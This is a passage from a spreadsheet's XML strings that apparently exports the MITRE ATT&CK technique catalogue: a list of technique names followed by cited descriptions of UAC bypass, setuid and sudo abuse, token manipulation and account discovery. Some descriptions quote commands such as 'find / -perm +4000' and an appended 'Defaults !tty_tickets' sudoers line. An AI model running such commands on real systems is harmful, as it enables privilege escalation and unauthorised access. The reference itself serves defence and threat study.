    <t>Obfuscated Files or Information: Embedded Payloads</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: HTML Smuggling</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Indicator Removal from Tools</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Software Packing</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Steganography</t>
  </si>
  <si>
    <t>Obfuscated Files or Information: Stripped Payloads</t>
  </si>
  <si>
    <t>Obtain Capabilities</t>
  </si>
  <si>
    <t>Obtain Capabilities: Code Signing Certificates</t>
  </si>
  <si>
    <t>Obtain Capabilities: Digital Certificates</t>
  </si>
  <si>
    <t>Obtain Capabilities: Exploits</t>
  </si>
  <si>
    <t>Obtain Capabilities: Malware</t>
  </si>
  <si>
    <t>Obtain Capabilities: Tool</t>
  </si>
  <si>
    <t>Obtain Capabilities: Vulnerabilities</t>
  </si>
  <si>
    <t>Office Application Startup</t>
  </si>
  <si>
    <t>Office Application Startup: Add-ins</t>
  </si>
  <si>
    <t>Office Application Startup: Office Template Macros</t>
  </si>
  <si>
    <t>Office Application Startup: Office Test</t>
  </si>
  <si>
    <t>Office Application Startup: Outlook Forms</t>
  </si>
  <si>
    <t>Office Application Startup: Outlook Home Page</t>
  </si>
  <si>
    <t>Office Application Startup: Outlook Rules</t>
  </si>
  <si>
    <t>Password Policy Discovery</t>
  </si>
  <si>
    <t>Peripheral Device Discovery</t>
  </si>
  <si>
    <t>Permission Groups Discovery</t>
  </si>
  <si>
    <t>Permission Groups Discovery: Cloud Groups</t>
  </si>
  <si>
    <t>Permission Groups Discovery: Domain Groups</t>
  </si>
  <si>
    <t>Permission Groups Discovery: Local Groups</t>
  </si>
  <si>
    <t>Phishing</t>
  </si>
  <si>
    <t>Phishing for Information</t>
  </si>
  <si>
    <t>Phishing for Information: Spearphishing Attachment</t>
  </si>
  <si>
    <t>Phishing for Information: Spearphishing Link</t>
  </si>
  <si>
    <t>Phishing for Information: Spearphishing Service</t>
  </si>
  <si>
    <t>Phishing: Spearphishing Attachment</t>
  </si>
  <si>
    <t>Phishing: Spearphishing Link</t>
  </si>
  <si>
    <t>Phishing: Spearphishing via Service</t>
  </si>
  <si>
    <t>Plist File Modification</t>
  </si>
  <si>
    <t>Pre-OS Boot</t>
  </si>
  <si>
    <t>Pre-OS Boot: Bootkit</t>
  </si>
  <si>
    <t>Pre-OS Boot: Component Firmware</t>
  </si>
  <si>
    <t>Pre-OS Boot: ROMMONkit</t>
  </si>
  <si>
    <t>Pre-OS Boot: System Firmware</t>
  </si>
  <si>
    <t>Pre-OS Boot: TFTP Boot</t>
  </si>
  <si>
    <t>Process Discovery</t>
  </si>
  <si>
    <t>Process Injection</t>
  </si>
  <si>
    <t>Process Injection: Asynchronous Procedure Call</t>
  </si>
  <si>
    <t>Process Injection: Dynamic-link Library Injection</t>
  </si>
  <si>
    <t>Process Injection: Extra Window Memory Injection</t>
  </si>
  <si>
    <t>Process Injection: ListPlanting</t>
  </si>
  <si>
    <t>Process Injection: Portable Executable Injection</t>
  </si>
  <si>
    <t>Process Injection: Proc Memory</t>
  </si>
  <si>
    <t>Process Injection: Process Doppelgänging</t>
  </si>
  <si>
    <t>Process Injection: Process Hollowing</t>
  </si>
  <si>
    <t>Process Injection: Ptrace System Calls</t>
  </si>
  <si>
    <t>Process Injection: Thread Execution Hijacking</t>
  </si>
  <si>
    <t>Process Injection: Thread Local Storage</t>
  </si>
  <si>
    <t>Process Injection: VDSO Hijacking</t>
  </si>
  <si>
    <t>Protocol Tunneling</t>
  </si>
  <si>
    <t>Proxy</t>
  </si>
  <si>
    <t>Proxy: Domain Fronting</t>
  </si>
  <si>
    <t>Proxy: External Proxy</t>
  </si>
  <si>
    <t>Proxy: Internal Proxy</t>
  </si>
  <si>
    <t>Proxy: Multi-hop Proxy</t>
  </si>
  <si>
    <t>Query Registry</t>
  </si>
  <si>
    <t>Reflective Code Loading</t>
  </si>
  <si>
    <t>Remote Access Software</t>
  </si>
  <si>
    <t>Remote Service Session Hijacking</t>
  </si>
  <si>
    <t>Remote Service Session Hijacking: RDP Hijacking</t>
  </si>
  <si>
    <t>Remote Service Session Hijacking: SSH Hijacking</t>
  </si>
  <si>
    <t>Remote Services</t>
  </si>
  <si>
    <t>Remote Services: Distributed Component Object Model</t>
  </si>
  <si>
    <t>Remote Services: Remote Desktop Protocol</t>
  </si>
  <si>
    <t>Remote Services: SMB/Windows Admin Shares</t>
  </si>
  <si>
    <t>Remote Services: SSH</t>
  </si>
  <si>
    <t>Remote Services: VNC</t>
  </si>
  <si>
    <t>Remote Services: Windows Remote Management</t>
  </si>
  <si>
    <t>Remote System Discovery</t>
  </si>
  <si>
    <t>Replication Through Removable Media</t>
  </si>
  <si>
    <t>Resource Hijacking</t>
  </si>
  <si>
    <t>Rogue Domain Controller</t>
  </si>
  <si>
    <t>Rootkit</t>
  </si>
  <si>
    <t>Scheduled Task/Job</t>
  </si>
  <si>
    <t>Scheduled Task/Job: At</t>
  </si>
  <si>
    <t>Scheduled Task/Job: Container Orchestration Job</t>
  </si>
  <si>
    <t>Scheduled Task/Job: Cron</t>
  </si>
  <si>
    <t>Scheduled Task/Job: Scheduled Task</t>
  </si>
  <si>
    <t>Scheduled Task/Job: Systemd Timers</t>
  </si>
  <si>
    <t>Scheduled Transfer</t>
  </si>
  <si>
    <t>Screen Capture</t>
  </si>
  <si>
    <t>Search Closed Sources</t>
  </si>
  <si>
    <t>Search Closed Sources: Purchase Technical Data</t>
  </si>
  <si>
    <t>Search Closed Sources: Threat Intel Vendors</t>
  </si>
  <si>
    <t>Search Open Technical Databases</t>
  </si>
  <si>
    <t>Search Open Technical Databases: CDNs</t>
  </si>
  <si>
    <t>Search Open Technical Databases: DNS/Passive DNS</t>
  </si>
  <si>
    <t>Search Open Technical Databases: Digital Certificates</t>
  </si>
  <si>
    <t>Search Open Technical Databases: Scan Databases</t>
  </si>
  <si>
    <t>Search Open Technical Databases: WHOIS</t>
  </si>
  <si>
    <t>Search Open Websites/Domains</t>
  </si>
  <si>
    <t>Search Open Websites/Domains: Code Repositories</t>
  </si>
  <si>
    <t>Search Open Websites/Domains: Search Engines</t>
  </si>
  <si>
    <t>Search Open Websites/Domains: Social Media</t>
  </si>
  <si>
    <t>Search Victim-Owned Websites</t>
  </si>
  <si>
    <t>Server Software Component</t>
  </si>
  <si>
    <t>Server Software Component: IIS Components</t>
  </si>
  <si>
    <t>Server Software Component: SQL Stored Procedures</t>
  </si>
  <si>
    <t>Server Software Component: Terminal Services DLL</t>
  </si>
  <si>
    <t>Server Software Component: Transport Agent</t>
  </si>
  <si>
    <t>Server Software Component: Web Shell</t>
  </si>
  <si>
    <t>Serverless Execution</t>
  </si>
  <si>
    <t>Service Stop</t>
  </si>
  <si>
    <t>Shared Modules</t>
  </si>
  <si>
    <t>Software Deployment Tools</t>
  </si>
  <si>
    <t>Software Discovery</t>
  </si>
  <si>
    <t>Software Discovery: Security Software Discovery</t>
  </si>
  <si>
    <t>Stage Capabilities</t>
  </si>
  <si>
    <t>Stage Capabilities: Drive-by Target</t>
  </si>
  <si>
    <t>Stage Capabilities: Install Digital Certificate</t>
  </si>
  <si>
    <t>Stage Capabilities: Link Target</t>
  </si>
  <si>
    <t>Stage Capabilities: SEO Poisoning</t>
  </si>
  <si>
    <t>Stage Capabilities: Upload Malware</t>
  </si>
  <si>
    <t>Stage Capabilities: Upload Tool</t>
  </si>
  <si>
    <t>Steal Application Access Token</t>
  </si>
  <si>
    <t>Steal Web Session Cookie</t>
  </si>
  <si>
    <t>Steal or Forge Authentication Certificates</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets: AS-REP Roasting</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets: Golden Ticket</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets: Kerberoasting</t>
  </si>
  <si>
    <t>Steal or Forge Kerberos Tickets: Silver Ticket</t>
  </si>
  <si>
    <t>Subvert Trust Controls</t>
  </si>
  <si>
    <t>Subvert Trust Controls: Code Signing</t>
  </si>
  <si>
    <t>Subvert Trust Controls: Code Signing Policy Modification</t>
  </si>
  <si>
    <t>Subvert Trust Controls: Gatekeeper Bypass</t>
  </si>
  <si>
    <t>Subvert Trust Controls: Install Root Certificate</t>
  </si>
  <si>
    <t>Subvert Trust Controls: Mark-of-the-Web Bypass</t>
  </si>
  <si>
    <t>Subvert Trust Controls: SIP and Trust Provider Hijacking</t>
  </si>
  <si>
    <t>Supply Chain Compromise</t>
  </si>
  <si>
    <t>Supply Chain Compromise: Compromise Hardware Supply Chain</t>
  </si>
  <si>
    <t>Supply Chain Compromise: Compromise Software Dependencies and Development Tools</t>
  </si>
  <si>
    <t>Supply Chain Compromise: Compromise Software Supply Chain</t>
  </si>
  <si>
    <t>System Binary Proxy Execution</t>
  </si>
  <si>
    <t>System Binary Proxy Execution: CMSTP</t>
  </si>
  <si>
    <t>System Binary Proxy Execution: Compiled HTML File</t>
  </si>
  <si>
    <t>System Binary Proxy Execution: Control Panel</t>
  </si>
  <si>
    <t>System Binary Proxy Execution: InstallUtil</t>
  </si>
  <si>
    <t>System Binary Proxy Execution: MMC</t>
  </si>
  <si>
    <t>System Binary Proxy Execution: Mavinject</t>
  </si>
  <si>
    <t>System Binary Proxy Execution: Mshta</t>
  </si>
  <si>
    <t>System Binary Proxy Execution: Msiexec</t>
  </si>
  <si>
    <t>System Binary Proxy Execution: Odbcconf</t>
  </si>
  <si>
    <t>System Binary Proxy Execution: Regsvcs/Regasm</t>
  </si>
  <si>
    <t>System Binary Proxy Execution: Regsvr32</t>
  </si>
  <si>
    <t>System Binary Proxy Execution: Rundll32</t>
  </si>
  <si>
    <t>System Binary Proxy Execution: Verclsid</t>
  </si>
  <si>
    <t>System Information Discovery</t>
  </si>
  <si>
    <t>System Location Discovery</t>
  </si>
  <si>
    <t>System Location Discovery: System Language Discovery</t>
  </si>
  <si>
    <t>System Network Configuration Discovery</t>
  </si>
  <si>
    <t>System Network Configuration Discovery: Internet Connection Discovery</t>
  </si>
  <si>
    <t>System Network Connections Discovery</t>
  </si>
  <si>
    <t>System Owner/User Discovery</t>
  </si>
  <si>
    <t>System Script Proxy Execution</t>
  </si>
  <si>
    <t>System Script Proxy Execution: PubPrn</t>
  </si>
  <si>
    <t>System Service Discovery</t>
  </si>
  <si>
    <t>System Services</t>
  </si>
  <si>
    <t>System Services: Launchctl</t>
  </si>
  <si>
    <t>System Services: Service Execution</t>
  </si>
  <si>
    <t>System Shutdown/Reboot</t>
  </si>
  <si>
    <t>System Time Discovery</t>
  </si>
  <si>
    <t>Taint Shared Content</t>
  </si>
  <si>
    <t>Template Injection</t>
  </si>
  <si>
    <t>Traffic Signaling</t>
  </si>
  <si>
    <t>Traffic Signaling: Port Knocking</t>
  </si>
  <si>
    <t>Traffic Signaling: Socket Filters</t>
  </si>
  <si>
    <t>Transfer Data to Cloud Account</t>
  </si>
  <si>
    <t>Trusted Developer Utilities Proxy Execution</t>
  </si>
  <si>
    <t>Trusted Developer Utilities Proxy Execution: MSBuild</t>
  </si>
  <si>
    <t>Trusted Relationship</t>
  </si>
  <si>
    <t>Unsecured Credentials</t>
  </si>
  <si>
    <t>Unsecured Credentials: Bash History</t>
  </si>
  <si>
    <t>Unsecured Credentials: Cloud Instance Metadata API</t>
  </si>
  <si>
    <t>Unsecured Credentials: Container API</t>
  </si>
  <si>
    <t>Unsecured Credentials: Credentials In Files</t>
  </si>
  <si>
    <t>Unsecured Credentials: Credentials in Registry</t>
  </si>
  <si>
    <t>Unsecured Credentials: Group Policy Preferences</t>
  </si>
  <si>
    <t>Unsecured Credentials: Private Keys</t>
  </si>
  <si>
    <t>Unused/Unsupported Cloud Regions</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material: Application Access Token</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material: Pass the Hash</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material: Pass the Ticket</t>
  </si>
  <si>
    <t>Use Alternate Authentication Material: Web Session Cookie</t>
  </si>
  <si>
    <t>User Execution</t>
  </si>
  <si>
    <t>User Execution: Malicious File</t>
  </si>
  <si>
    <t>User Execution: Malicious Image</t>
  </si>
  <si>
    <t>User Execution: Malicious Link</t>
  </si>
  <si>
    <t>Valid Accounts</t>
  </si>
  <si>
    <t>Valid Accounts: Cloud Accounts</t>
  </si>
  <si>
    <t>Valid Accounts: Default Accounts</t>
  </si>
  <si>
    <t>Valid Accounts: Domain Accounts</t>
  </si>
  <si>
    <t>Valid Accounts: Local Accounts</t>
  </si>
  <si>
    <t>Video Capture</t>
  </si>
  <si>
    <t>Virtualization/Sandbox Evasion</t>
  </si>
  <si>
    <t>Virtualization/Sandbox Evasion: System Checks</t>
  </si>
  <si>
    <t>Virtualization/Sandbox Evasion: Time Based Evasion</t>
  </si>
  <si>
    <t>Virtualization/Sandbox Evasion: User Activity Based Checks</t>
  </si>
  <si>
    <t>Weaken Encryption</t>
  </si>
  <si>
    <t>Weaken Encryption: Disable Crypto Hardware</t>
  </si>
  <si>
    <t>Weaken Encryption: Reduce Key Space</t>
  </si>
  <si>
    <t>Web Service</t>
  </si>
  <si>
    <t>Web Service: Bidirectional Communication</t>
  </si>
  <si>
    <t>Web Service: Dead Drop Resolver</t>
  </si>
  <si>
    <t>Web Service: One-Way Communication</t>
  </si>
  <si>
    <t>Windows Management Instrumentation</t>
  </si>
  <si>
    <t>XSL Script Processing</t>
  </si>
  <si>
    <t>Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.</t>
  </si>
  <si>
    <t>Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.(Citation: TechNet How UAC Works)
If the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) objects without prompting the user through the UAC notification box.(Citation: TechNet Inside UAC)(Citation: MSDN COM Elevation) An example of this is use of [Rundll32](https://attack.mitre.org/techniques/T1218/011) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://attack.mitre.org/techniques/T1559/001) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.(Citation: Davidson Windows)
Many methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods(Citation: Github UACMe) that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:
* &lt;code&gt;eventvwr.exe&lt;/code&gt; can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit)
Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass)</t>
  </si>
  <si>
    <t>Adversaries may leverage the &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; API to escalate privileges by prompting the user for credentials.(Citation: AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. 
Although this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.
Adversaries may abuse &lt;code&gt;AuthorizationExecuteWithPrivileges&lt;/code&gt; to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) to trick the user into granting escalated privileges to malicious code.(Citation: Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer Feb 2019) This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.(Citation: Death by 1000 installers; it's all broken!)</t>
  </si>
  <si>
    <t>An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) user’s context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.(Citation: setuid man page) Normally an application is run in the current user’s context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.
Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222/002)). The &lt;code&gt;chmod&lt;/code&gt; command can set these bits with bitmasking, &lt;code&gt;chmod 4777 [file]&lt;/code&gt; or via shorthand naming, &lt;code&gt;chmod u+s [file]&lt;/code&gt;. This will enable the setuid bit. To enable the setgit bit, &lt;code&gt;chmod 2775&lt;/code&gt; and &lt;code&gt;chmod g+s&lt;/code&gt; can be used.
Adversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.(Citation: OSX Keydnap malware) This abuse is often part of a "shell escape" or other actions to bypass an execution environment with restricted permissions.
Alternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://attack.mitre.org/techniques/T1083)). The setuid and setguid bits are indicated with an "s" instead of an "x" when viewing a file's attributes via &lt;code&gt;ls -l&lt;/code&gt;. The &lt;code&gt;find&lt;/code&gt; command can also be used to search for such files. For example, &lt;code&gt;find / -perm +4000 2&gt;/dev/null&lt;/code&gt; can be used to find files with setuid set and &lt;code&gt;find / -perm +2000 2&gt;/dev/null&lt;/code&gt; may be used for setgid. Binaries that have these bits set may then be abused by adversaries.(Citation: GTFOBins Suid)</t>
  </si>
  <si>
    <t>Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.
Within Linux and MacOS systems, sudo (sometimes referred to as "superuser do") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The &lt;code&gt;sudo&lt;/code&gt; command "allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments."(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a &lt;code&gt;timestamp_timeout&lt;/code&gt;, which is the amount of time in minutes between instances of &lt;code&gt;sudo&lt;/code&gt; before it will re-prompt for a password. This is because &lt;code&gt;sudo&lt;/code&gt; has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at &lt;code&gt;/var/db/sudo&lt;/code&gt; with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a &lt;code&gt;tty_tickets&lt;/code&gt; variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).
The sudoers file, &lt;code&gt;/etc/sudoers&lt;/code&gt;, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like &lt;code&gt;user1 ALL=(ALL) NOPASSWD: ALL&lt;/code&gt;.(Citation: OSX.Dok Malware) Elevated privileges are required to edit this file though.
Adversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, &lt;code&gt;/var/db/sudo&lt;/code&gt;'s timestamp can be monitored to see if it falls within the &lt;code&gt;timestamp_timeout&lt;/code&gt; range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if &lt;code&gt;tty_tickets&lt;/code&gt; is disabled, adversaries can do this from any tty for that user.
In the wild, malware has disabled &lt;code&gt;tty_tickets&lt;/code&gt; to potentially make scripting easier by issuing &lt;code&gt;echo \'Defaults !tty_tickets\' &gt;&gt; /etc/sudoers&lt;/code&gt;.(Citation: cybereason osx proton) In order for this change to be reflected, the malware also issued &lt;code&gt;killall Terminal&lt;/code&gt;. As of macOS Sierra, the sudoers file has &lt;code&gt;tty_tickets&lt;/code&gt; enabled by default.</t>
  </si>
  <si>
    <t>Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
An adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001)) or used to spawn a new process (i.e. [Create Process with Token](https://attack.mitre.org/techniques/T1134/002)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.(Citation: Pentestlab Token Manipulation)
Any standard user can use the &lt;code&gt;runas&lt;/code&gt; command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.</t>
  </si>
  <si>
    <t>Adversaries may create a new process with a different token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as &lt;code&gt;CreateProcessWithTokenW&lt;/code&gt; and &lt;code&gt;runas&lt;/code&gt;.(Citation: Microsoft RunAs)
Creating processes with a different token may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used (ex: gathered via other means such as [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003)).</t>
  </si>
  <si>
    <t>Adversaries may make and impersonate tokens to escalate privileges and bypass access controls. If an adversary has a username and password but the user is not logged onto the system, the adversary can then create a logon session for the user using the &lt;code&gt;LogonUser&lt;/code&gt; function. The function will return a copy of the new session's access token and the adversary can use &lt;code&gt;SetThreadToken&lt;/code&gt; to assign the token to a thread.</t>
  </si>
  <si>
    <t>Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the &lt;code&gt;CreateProcess&lt;/code&gt; API call, which supports a parameter that defines the PPID to use.(Citation: DidierStevens SelectMyParent Nov 2009) This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via &lt;code&gt;svchost.exe&lt;/code&gt; or &lt;code&gt;consent.exe&lt;/code&gt;) rather than the current user context.(Citation: Microsoft UAC Nov 2018)
Adversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://attack.mitre.org/techniques/T1059/001)/[Rundll32](https://attack.mitre.org/techniques/T1218/011) to be &lt;code&gt;explorer.exe&lt;/code&gt; rather than an Office document delivered as part of [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).(Citation: CounterCept PPID Spoofing Dec 2018) This spoofing could be executed via [Visual Basic](https://attack.mitre.org/techniques/T1059/005) within a malicious Office document or any code that can perform [Native API](https://attack.mitre.org/techniques/T1106).(Citation: CTD PPID Spoofing Macro Mar 2019)(Citation: CounterCept PPID Spoofing Dec 2018)
Explicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as &lt;code&gt;lsass.exe&lt;/code&gt;), causing the new process to be elevated via the inherited access token.(Citation: XPNSec PPID Nov 2017)</t>
  </si>
  <si>
    <t>Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
With Domain Administrator (or equivalent) rights, harvested or well-known SID values (Citation: Microsoft Well Known SIDs Jun 2017) may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://attack.mitre.org/techniques/T1021), [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002), or [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006).</t>
  </si>
  <si>
    <t>Adversaries may duplicate then impersonate another user's token to escalate privileges and bypass access controls. An adversary can create a new access token that duplicates an existing token using &lt;code&gt;DuplicateToken(Ex)&lt;/code&gt;. The token can then be used with &lt;code&gt;ImpersonateLoggedOnUser&lt;/code&gt; to allow the calling thread to impersonate a logged on user's security context, or with &lt;code&gt;SetThreadToken&lt;/code&gt; to assign the impersonated token to a thread.
An adversary may do this when they have a specific, existing process they want to assign the new token to. For example, this may be useful for when the target user has a non-network logon session on the system.</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529) to set malicious changes into place.(Citation: CarbonBlack LockerGoga 2019)(Citation: Unit42 LockerGoga 2019)
In Windows, [Net](https://attack.mitre.org/software/S0039) utility, &lt;code&gt;Set-LocalUser&lt;/code&gt; and &lt;code&gt;Set-ADAccountPassword&lt;/code&gt; [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets may be used by adversaries to modify user accounts. In Linux, the &lt;code&gt;passwd&lt;/code&gt; utility may be used to change passwords. Accounts could also be disabled by Group Policy. 
Adversaries who use ransomware may first perform this and other Impact behaviors, such as [Data Destruction](https://attack.mitre.org/techniques/T1485) and [Defacement](https://attack.mitre.org/techniques/T1491), before completing the [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) objective. </t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.
With authenticated access there are several tools that can be used to find accounts. The &lt;code&gt;Get-MsolRoleMember&lt;/code&gt; PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance) The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command &lt;code&gt;az ad user list&lt;/code&gt; will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018) 
The AWS command &lt;code&gt;aws iam list-users&lt;/code&gt; may be used to obtain a list of users in the current account while &lt;code&gt;aws iam list-roles&lt;/code&gt; can obtain IAM roles that have a specified path prefix.(Citation: AWS List Roles)(Citation: AWS List Users) In GCP, &lt;code&gt;gcloud iam service-accounts list&lt;/code&gt; and &lt;code&gt;gcloud projects get-iam-policy&lt;/code&gt; may be used to obtain a listing of service accounts and users in a project.(Citation: Google Cloud - IAM Servie Accounts List API)</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior.
Commands such as &lt;code&gt;net user /domain&lt;/code&gt; and &lt;code&gt;net group /domain&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility, &lt;code&gt;dscacheutil -q group&lt;/code&gt;on macOS, and &lt;code&gt;ldapsearch&lt;/code&gt; on Linux can list domain users and groups.</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)
In on-premises Exchange and Exchange Online, the&lt;code&gt;Get-GlobalAddressList&lt;/code&gt; PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)
In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior.
Commands such as &lt;code&gt;net user&lt;/code&gt; and &lt;code&gt;net localgroup&lt;/code&gt; of the [Net](https://attack.mitre.org/software/S0039) utility and &lt;code&gt;id&lt;/code&gt; and &lt;code&gt;groups&lt;/code&gt;on macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the &lt;code&gt;/etc/passwd&lt;/code&gt; file. On macOS the &lt;code&gt;dscl . list /Users&lt;/code&gt; command can be used to enumerate local accounts.</t>
  </si>
  <si>
    <t>Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. 
